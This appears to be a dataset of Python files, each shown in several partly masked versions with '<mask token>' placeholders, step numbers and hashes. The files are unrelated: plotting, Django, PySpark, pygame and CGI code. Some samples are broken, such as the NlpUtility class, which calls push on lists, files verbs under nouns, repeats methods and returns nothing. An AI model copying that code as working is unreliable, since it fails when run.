import matplotlib.pyplot as pyplot
from datetime import datetime
from sub.inputprocess import CONSTANTS as CONS
def get_data():
"""Read output file to get data."""
try:
with open(CONS['OUTPUT_FILE'], 'r') as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print('Data file not found.')
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]['objective']) for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == 'x':
os._exit(0)
if event.key == 's':
now = datetime.now()
current_time = now.strftime('%H-%M-%S')
plot_name = 'Plot' + '-' + current_time
pyplot.title('', loc='left', pad=20)
fig.savefig('%s%s%s' % (CONS['OUTPUT_PHOTO_DIRECTORY'],
plot_name, CONS['PHOTO_TYPE']), transparent=False, dpi=300)
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
subplot.yaxis.grid(True, linestyle='dashed')
new_values = get_new_values(values)
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
pyplot.title('Press X to exit\nPress S to save', loc='left',
fontsize=14, color='#1F76B4', style='italic', pad=20)
pyplot.title(
f"""{'Max objective:':>25}{max(values):>10.2E}
{'Generation:':>25}{values.index(max(values)):>10}"""
, loc='right', fontfamily='Lucida Sans Typewriter', fontsize=12,
color='#FF7E0E', pad=20)
maplot.rcParams['toolbar'] = 'None'
maplot.rcParams['font.family'] = 'Candara'
maplot.rcParams['font.size'] = 12
maplot.rcParams['font.weight'] = 500
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title('Prosthetic Foot Design by Genetic Algorithm')
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS['ICON_FILE'])
subplot = fig.add_subplot(111, frameon=True)
subplot.spines['right'].set_visible(False)
subplot.spines['left'].set_visible(False)
subplot.spines['top'].set_visible(False)
subplot.yaxis.tick_right()
subplot.tick_params(axis='y', which='major', pad=5)
subplot.tick_params(axis='x', which='major', pad=5)
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
pyplot.connect('key_press_event', on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
pyplot.show()
if __name__ == '__main__':
__package__ = 'inputprocess'
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS['IS_ANIMATION'])
| """Plot the output data.
"""
# Standard library
import os
import json
import math
import matplotlib as maplot
import matplotlib.pyplot as pyplot
from datetime import datetime
# User library
from sub.inputprocess import CONSTANTS as CONS
# **json.loads(json_data)
def get_data():
"""Read output file to get data."""
try:
with open(CONS["OUTPUT_FILE"], "r") as file:
data = json.load(file)[1]
return data
except FileNotFoundError:
print("Data file not found.")
exit()
def get_objectives(data):
"""Get a list of all first chromosomes' objective values."""
objectives = [math.log(population[0]["objective"]) for population in data]
# objectives = [population[0]["objective"] for population in data]
return objectives
def get_new_values(values):
"""Record any changes higher. Its size is the same as its argument's."""
new_values = []
new_value = values[0]
for value in values:
if value > new_value:
new_value = value
new_values.append(new_value)
return new_values
def main(values, is_animation=False):
"""Main function to show the plot which could be played with animation."""
def on_clicked(event):
"""Direct the program when a key is pressed."""
if event.key == "x":
# Use this os._exit(0) to close whole window, even when playing
os._exit(0)
if event.key == "s":
# Get time to define image's name
now = datetime.now()
current_time = now.strftime("%H-%M-%S")
plot_name = "Plot" + "-" + current_time
# Remove left title, then save image
pyplot.title("", loc="left", pad=20)
fig.savefig(
"%s%s%s"
% (
CONS["OUTPUT_PHOTO_DIRECTORY"],
plot_name,
CONS["PHOTO_TYPE"],
),
transparent=False,
dpi=300,
)
# Use this exit(0) to prevent exiting when playing the plot
# but allow closing when plotting finishes
exit(0)
def draw(values):
"""Plot the grid, the line graphs and the titles."""
# Turn on grid with dashed style
subplot.yaxis.grid(True, linestyle="dashed")
# Get list of new higher values
new_values = get_new_values(values)
# Plot 2 lines
subplot.plot(range(len(values)), values)
subplot.plot(range(len(new_values)), new_values, linewidth=2)
# Print left plot title
pyplot.title(
"Press X to exit\nPress S to save",
loc="left",
fontsize=14,
color="#1F76B4",
style="italic",
pad=20,
)
# Print right plot title
pyplot.title(
f"{'Max objective:':>25}{max(values):>10.2E}\n"
f"{'Generation:':>25}{values.index(max(values)):>10}",
loc="right",
fontfamily="Lucida Sans Typewriter",
fontsize=12,
color="#FF7E0E",
pad=20,
)
# The following code configures some elements of the plot window
# Disable toolbar
maplot.rcParams["toolbar"] = "None"
# Set font
maplot.rcParams["font.family"] = "Candara"
maplot.rcParams["font.size"] = 12
maplot.rcParams["font.weight"] = 500
# Set window title
fig = pyplot.figure(figsize=(10, 5))
fig.canvas.set_window_title("Prosthetic Foot Design by Genetic Algorithm")
# Set icon
manager = pyplot.get_current_fig_manager()
manager.window.wm_iconbitmap(CONS["ICON_FILE"])
# Disable some borders
subplot = fig.add_subplot(111, frameon=True)
subplot.spines["right"].set_visible(False)
subplot.spines["left"].set_visible(False)
subplot.spines["top"].set_visible(False)
# Push verticle axis to the right
subplot.yaxis.tick_right()
# Padding axis label from plot area, maybe unnecessary
subplot.tick_params(axis="y", which="major", pad=5)
subplot.tick_params(axis="x", which="major", pad=5)
# Adjust subplot size based on window size
pyplot.subplots_adjust(left=0.03, right=0.94, top=0.82, bottom=0.1)
# Reconize key pressed
pyplot.connect("key_press_event", on_clicked)
if is_animation:
for index in range(1, len(values) + 1):
subplot.clear()
draw(values[:index])
pyplot.pause(0.0001)
else:
draw(values)
# Hold window
pyplot.show()
if __name__ == "__main__":
__package__ = "inputprocess"
objectives = get_objectives(get_data())
main(objectives, is_animation=CONS["IS_ANIMATION"])
| [
3,
4,
5,
6,
7
] |
54 | d2a153fffccd4b681eebce823e641e195197cde7 | <mask token>
| <mask token>
class NamingConvention:
<mask token>
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| <mask token>
class NamingConvention:
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| <mask token>
import os
import json
class NamingConvention:
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(
__file__)), 'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
| """
Created on 02.09.2013
@author: Paul Schweizer
@email: [email protected]
@brief: Holds all the namingconventions for pandora's box
"""
import os
import json
class NamingConvention():
"""Imports naming conventions from the respective .json file and puts them
into class variables.
"""
def __init__(self):
namingconventions = os.path.join(os.path.dirname(os.path.dirname(__file__)),
'data', 'strings', 'namingconvention.json')
namingconventions = json.load(open(namingconventions))
for key, value in namingconventions.items():
setattr(NamingConvention, key, value)
# end for constant in constants
# end def __init__
# end class NamingConvention
| [
0,
2,
3,
4,
5
] |
55 | aff1d702e591efcfc0fc93150a3fbec532408137 | <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<mask token>
| <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
<mask token>
router.register('lamps', LampViewSet)
| <mask token>
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
| from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register('lamps', LampViewSet)
| from rest_framework import serializers, viewsets, routers
from lamp_control.models import Lamp
class LampSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Lamp
fields = '__all__'
class LampViewSet(viewsets.ModelViewSet):
serializer_class = LampSerializer
queryset = Lamp.objects.all()
router = routers.DefaultRouter()
router.register(r'lamps', LampViewSet)
| [
3,
4,
5,
6,
7
] |
56 | c6502ea2b32ad90c76b6dfaf3ee3218d029eba15 | class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
<mask token>
<mask token>
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
| class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
<mask token>
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
| class NlpUtility:
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == 'VB':
nouns.push(word)
<mask token>
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
| class NlpUtility:
"""
Utility methods to get particular parts of speech from a token set
"""
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == 'VB':
nouns.push(word)
def get_adjectives(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == 'NN':
nouns.push(word)
| class NlpUtility():
"""
Utility methods to get particular parts of speech from a token set
"""
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_verbs(self, tokens):
verbs = []
for word, pos in tokens:
if pos == "VB":
nouns.push(word)
def get_adjectives(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
def get_nouns(self, tokens):
nouns = []
for word, pos in tokens:
if pos == "NN":
nouns.push(word)
| [
3,
4,
5,
7,
8
] |
57 | 675fbdfd519d00ab10bf613e8abb7338e484fe65 | <mask token>
| <mask token>
log.setLevel(logging.DEBUG)
<mask token>
stream_hander.setFormatter(formatter)
log.addHandler(stream_hander)
| <mask token>
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
log = logging.getLogger('othello')
log.setLevel(logging.DEBUG)
stream_hander = logging.StreamHandler()
stream_hander.setFormatter(formatter)
log.addHandler(stream_hander)
| import logging
formatter = logging.Formatter('%(asctime)s [%(levelname)s] : %(message)s')
log = logging.getLogger('othello')
log.setLevel(logging.DEBUG)
stream_hander = logging.StreamHandler()
stream_hander.setFormatter(formatter)
log.addHandler(stream_hander)
| import logging
formatter = logging.Formatter("%(asctime)s [%(levelname)s] : %(message)s")
log = logging.getLogger("othello")
log.setLevel(logging.DEBUG)
stream_hander = logging.StreamHandler()
stream_hander.setFormatter(formatter)
log.addHandler(stream_hander)
| [
0,
1,
2,
3,
4
] |
58 | d7b45e76f150107cd62be160e8938f17dad90623 | <mask token>
| <mask token>
with open('testfile_short1.csv', 'r') as original:
data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified:
modified.write(data)
| import pandas as pd
from sqlalchemy import create_engine
with open('testfile_short1.csv', 'r') as original:
data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified:
modified.write(data)
| import pandas as pd
from sqlalchemy import create_engine
# file = 'testfile.csv'
# print(pd.read_csv(file, nrows=5))
with open('testfile_short1.csv', 'r') as original: data = original.read()
for i in range(2):
with open('testfile_short3.csv', 'a') as modified: modified.write(data) | null | [
0,
1,
2,
3
] |
59 | 61454a3d6b5b17bff871ededc6ddfe8384043884 | <mask token>
class ItemEffect(AbstractItemEffect):
<mask token>
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
<mask token>
| <mask token>
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
<mask token>
| <mask token>
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(item_type=item_type, item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.
ITEM_HEALING_WAND, image_file_path=
'resources/graphics/item_healing_wand.png', item_equipment_category
=ItemEquipmentCategory.MAIN_HAND, name='Healing wand',
custom_description=['When you damage an enemy, gain +' + str(
HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(
BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],
custom_effect=ItemEffect())
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, 'Healing wand')
| from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect
from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat
from pythongame.core.game_data import UiIconSprite, register_buff_text
from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState
from pythongame.core.item_effects import AbstractItemEffect
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_custom_effect_item
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(
BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS}
)
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(item_type=item_type, item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND, sprite=Sprite.
ITEM_HEALING_WAND, image_file_path=
'resources/graphics/item_healing_wand.png', item_equipment_category
=ItemEquipmentCategory.MAIN_HAND, name='Healing wand',
custom_description=['When you damage an enemy, gain +' + str(
HEALTH_REGEN_BONUS) + ' health regen for ' + '{:.0f}'.format(
BUFF_DURATION / 1000) + 's'], stat_modifier_intervals=[],
custom_effect=ItemEffect())
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, 'Healing wand')
| from pythongame.core.buff_effects import get_buff_effect, register_buff_effect, StatModifyingBuffEffect
from pythongame.core.common import ItemType, Sprite, BuffType, Millis, HeroStat
from pythongame.core.game_data import UiIconSprite, register_buff_text
from pythongame.core.game_state import Event, PlayerDamagedEnemy, GameState
from pythongame.core.item_effects import AbstractItemEffect
from pythongame.core.item_inventory import ItemEquipmentCategory
from pythongame.game_data.items.register_items_util import register_custom_effect_item
BUFF_TYPE = BuffType.BUFFED_BY_HEALING_WAND
HEALTH_REGEN_BONUS = 1
BUFF_DURATION = Millis(5000)
class ItemEffect(AbstractItemEffect):
def item_handle_event(self, event: Event, game_state: GameState):
if isinstance(event, PlayerDamagedEnemy):
game_state.player_state.gain_buff_effect(get_buff_effect(BUFF_TYPE), BUFF_DURATION)
class BuffedByHealingWand(StatModifyingBuffEffect):
def __init__(self):
super().__init__(BUFF_TYPE, {HeroStat.HEALTH_REGEN: HEALTH_REGEN_BONUS})
def register_healing_wand_item():
item_type = ItemType.HEALING_WAND
register_custom_effect_item(
item_type=item_type,
item_level=4,
ui_icon_sprite=UiIconSprite.ITEM_HEALING_WAND,
sprite=Sprite.ITEM_HEALING_WAND,
image_file_path="resources/graphics/item_healing_wand.png",
item_equipment_category=ItemEquipmentCategory.MAIN_HAND,
name="Healing wand",
custom_description=["When you damage an enemy, gain +" + str(HEALTH_REGEN_BONUS) + " health regen for " +
"{:.0f}".format(BUFF_DURATION / 1000) + "s"],
stat_modifier_intervals=[],
custom_effect=ItemEffect()
)
register_buff_effect(BUFF_TYPE, BuffedByHealingWand)
register_buff_text(BUFF_TYPE, "Healing wand")
| [
3,
4,
6,
7,
8
] |
60 | 4c60fd123f591bf2a88ca0affe14a3c3ec0d3cf6 | <mask token>
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
<mask token>
| <mask token>
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
<mask token>
print(top)
| <mask token>
sc = SparkContext('local', 'weblog app')
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(
lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda
l: l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p: (p[0],
range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)
top = sorted_ranges.take(10)
print(top)
| from pyspark import SparkContext
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sc = SparkContext('local', 'weblog app')
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(
lambda l: l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p: (p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda
l: l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p: (p[0],
range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x: x[1], False)
top = sorted_ranges.take(10)
print(top)
| from pyspark import SparkContext
from pyspark.sql import SQLContext
from pyspark.sql.types import *
sc = SparkContext("local", "weblog app")
effective_care = sc.textFile('file:///data/exercise1/effective_care').map(lambda l:l.encode().split(',')).map(lambda x: (x[0], x[1:]))
procedure_care = effective_care.map(lambda p:(p[1][1], [p[0], p[1][2]]))
procedure_care_grouped = procedure_care.groupByKey()
def range_func(measures):
scores = []
for entry in measures:
try:
curr = int(entry[1])
except:
curr = None
if curr is not None:
scores.append(curr)
if len(scores) < 1:
return 0
return max(scores) - min(scores)
measure_dates = sc.textFile('file:///data/exercise1/measure_dates').map(lambda l:l.encode().split(',')).map(lambda x: (x[1], x[0]))
procedure_score_range = procedure_care_grouped.map(lambda p:(p[0], range_func(p[1]))).join(measure_dates)
sorted_ranges = procedure_score_range.sortBy(lambda x:x[1], False)
top = sorted_ranges.take(10)
print(top)
| [
1,
2,
3,
4,
5
] |
61 | 4264cba9a6c39219d21bd21d4b21009bacd1db38 | #!/usr/bin/python
import operator
import cgi, sys, LINK_HEADERS
import simplejson as json
from datetime import datetime
from dateutil import tz
from decimal import *
sys.path.insert(0, str(LINK_HEADERS.DAO_LINK))
from transaction_dao import Transaction_dao
from user_portfolio_dao import User_portfolio_dao
from user_stock_value_dao import User_stock_value_dao
from company_dao import Company_dao
from history_dao import History_dao
from sector_info_dao import Sector_info_dao
print "Content-Type: text/html\r\n\r\n"
form = cgi.FieldStorage()
if form.getvalue("username") != None:
username = form.getvalue("username")
if form.getvalue("filter") != None:
portfolio_filter = form.getvalue("filter")
if portfolio_filter == '1':
filter_flag = "ALL"
elif portfolio_filter == '2':
filter_flag = "ALGOS"
elif portfolio_filter == '0':
filter_flag = "USER"
else:
filter_flag = portfolio_filter
tdao = Transaction_dao()
u2 = User_stock_value_dao()
u1 = User_portfolio_dao()
cdao = Company_dao()
hdao = History_dao()
data={}
if filter_flag == "ALL":
t = hdao.select_all(username)
l = tdao.get_user_stock_list(username)
elif filter_flag == "ALGOS":
t = hdao.select_all_algo_trades(username)
l = tdao.get_all_algo_stock_list(username)
elif filter_flag == "USER":
t = hdao.select_all_user_trades(username)
l = tdao.get_only_user_stock_list(username)
else:
t = hdao.select_algo_trades(username, filter_flag)
l = tdao.get_algo_stock_list(username, filter_flag)
# HISTORY
if t:
data['transactions']={}
for i in range(len(t)):
data['transactions'][i]={}
#start date formatting
from_zone = tz.tzutc()
to_zone = tz.tzlocal()
date_time = t[i].get_trans_date()
date_time = date_time.strftime('%Y-%m-%d %H:%M:%S')
date_time = datetime.strptime(date_time, '%Y-%m-%d %H:%M:%S')
date_time = date_time.replace(tzinfo=from_zone)
updated_date_time = date_time.astimezone(to_zone)
updated_date_time = updated_date_time.strftime('%Y-%m-%d %H:%M:%S')
#end date formatting
data['transactions'][i]['trans_date'] = updated_date_time
data['transactions'][i]['trans_type'] = t[i].get_trans_type()
# try:
# data['transactions'][i]['name']=cdao.get_company_model(t[i].get_stock()).get_name()
# except:
# data['transactions'][i]['name']=""
data['transactions'][i]['stock'] = t[i].get_stock()
data['transactions'][i]['price'] = t[i].get_price()
data['transactions'][i]['total_price'] = t[i].get_total_price()
data['transactions'][i]['volume'] = t[i].get_volume()
else:
data['transactions']={}
data['transactions'][0]={}
data['transactions'][0]['trans_date'] = ""
data['transactions'][0]['trans_type'] = ""
data['transactions'][0]['name']=""
data['transactions'][0]['stock'] = ""
data['transactions'][0]['price'] = ""
data['transactions'][0]['total_price'] = ""
data['transactions'][0]['volume'] = ""
# OWNED STOCKS
sector_dao=Sector_info_dao()
data['sector_volume']={}
if l:
data['owned_stocks']={}
#total_stock_value = 0
# for i in range(len(l)):
# c = cdao.get_company_model(l[i])
c = cdao.get_list_of_company_models(l)
if c:
for i in range(len(c)):
try:
o = tdao.get_owned_stock_model(username, c[i].get_symbol(), c[i].get_ask())
except:
continue
data['owned_stocks'][i]={}
data['owned_stocks'][i]['name']=c[i].get_name()
data['owned_stocks'][i]['stock'] = c[i].get_symbol()
data['owned_stocks'][i]['current_shares'] = o.get_volume()
data['owned_stocks'][i]['current_price'] = c[i].get_ask()
data['owned_stocks'][i]['total_worth'] = o.get_total_worth()
data['owned_stocks'][i]['profit'] = o.get_profit()
#total_stock_value = Decimal(total_stock_value) + Decimal(o.get_total_worth())
#--------Code for chart - sector_volume:---
volume=o.get_volume()
symbol=c[i].get_symbol()
try:
sector=sector_dao.get_sector_by_symbol(symbol)
if(sector.strip()==''):sector="Other"
except:
sector="Other"
if(sector not in data['sector_volume']):
data['sector_volume'][sector]=volume;
else:
data['sector_volume'][sector]+=volume;
#----------end of code for chart--------
else:
data['owned_stocks']={}
data['owned_stocks'][0]={}
data['owned_stocks'][0]['name'] =""
data['owned_stocks'][0]['stock'] = ""
data['owned_stocks'][0]['current_shares'] = ""
data['owned_stocks'][0]['current_price'] = ""
data['owned_stocks'][0]['total_worth'] = ""
data['owned_stocks'][0]['profit'] = ""
# PORTFOLIO INFORMATION
#---------------------Code for Chart Generation-----------------------------
sectors=[]
volume=[]
sorted_volume=sorted(data['sector_volume'].items(),key=operator.itemgetter(1))
length=len(sorted_volume);
#Insertion Sort
for i in range(length):
j=i
while(j>0 and sorted_volume[j][1]>sorted_volume[j-1][1]):
temp=sorted_volume[j-1]
sorted_volume[j-1]=sorted_volume[j]
sorted_volume[j]=temp
j=j-1
MAX=35
for i in range(length):
if(i>=MAX):break;
if(sorted_volume[i][0]=='Other'):continue
sectors.append(sorted_volume[i][0])
volume.append(sorted_volume[i][1])
data['chart_axis']=sectors;
data['chart_data']=volume;
#--------------------------------end of code for chart--------------------#
up = u1.get_user_portfolio_model(username)
usv = u2.get_user_stock_value_model(username)
data['users']={}
if up:
data['users']['total_portfolio'] = up.get_total_portfolio()
data['users']['total_deposited'] = up.get_total_deposited()
data['users']['available_funds'] = up.get_available_funds()
else:
data['users']['total_portfolio'] = 0
data['users']['total_deposited'] = 0
data['users']['available_funds'] = 0
if usv:
data['users']['total_stock_values'] = usv.get_total_stock_values()
data['users']['profit'] = usv.get_profit()
else:
data['users']['total_stock_values'] = 0
data['users']['profit'] = 0
#----------------------------------code owned Stocks chart-----------------------------#
owned_stocks=data['owned_stocks']
owned_stocks_graph_data={}
sorted_owned_stocks_chart_axis=[]
sorted_owned_stocks_chart_value=[]
for i in owned_stocks:
owned_stocks_graph_data[owned_stocks[i]['stock']]=owned_stocks[i]['total_worth']
length=len(owned_stocks_graph_data);
sorted_data=sorted(owned_stocks_graph_data.items(),key=operator.itemgetter(1))
for i in range(length-1,-1,-1):
if(length-i>MAX):break
sorted_owned_stocks_chart_axis.append(sorted_data[i][0])
sorted_owned_stocks_chart_value.append(sorted_data[i][1])
data['owned_stocks_chart_axis']=sorted_owned_stocks_chart_axis;
data['owned_stocks_chart_value']=sorted_owned_stocks_chart_value;
json_result = json.dumps(data)
print json_result
| null | null | null | null | [
0
] |
62 | 5c30b0e952ddf2e05a7ad5f8d9bbd4f5e22f887d | <mask token>
| <mask token>
print(str1 and str2)
<mask token>
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| str1 = '12345678'
str2 = '456'
print(str1 and str2)
str1 = 'cekjgdklab'
str2 = 'gka'
nPos = -1
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| # strspn(str1,str2)
str1 = '12345678'
str2 = '456'
# str1 and chars both in str1 and str2
print(str1 and str2)
str1 = 'cekjgdklab'
str2 = 'gka'
nPos = -1
for c in str1:
if c in str2:
nPos = str1.index(c)
break
print(nPos)
| null | [
0,
1,
2,
3
] |
63 | a86b64ccd0dab4ab70ca9c2b7625fb34afec3794 | <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
<mask token>
<mask token>
| <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
<mask token>
| <mask token>
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
admin.site.register(ArticlePost, SummernoteModelAdmin)
| from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost
class SomeModelAdmin(SummernoteModelAdmin):
summernote_fields = '__all__'
admin.site.register(ArticlePost, SummernoteModelAdmin)
| from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
from .models import ArticlePost
# Register your models here.
class SomeModelAdmin(SummernoteModelAdmin): # instead of ModelAdmin
summernote_fields = '__all__'
admin.site.register(ArticlePost, SummernoteModelAdmin) | [
1,
2,
3,
4,
5
] |
64 | f17d33f1d035da42dc9a2b4c0c60beefc6a48dea | <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
<mask token>
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
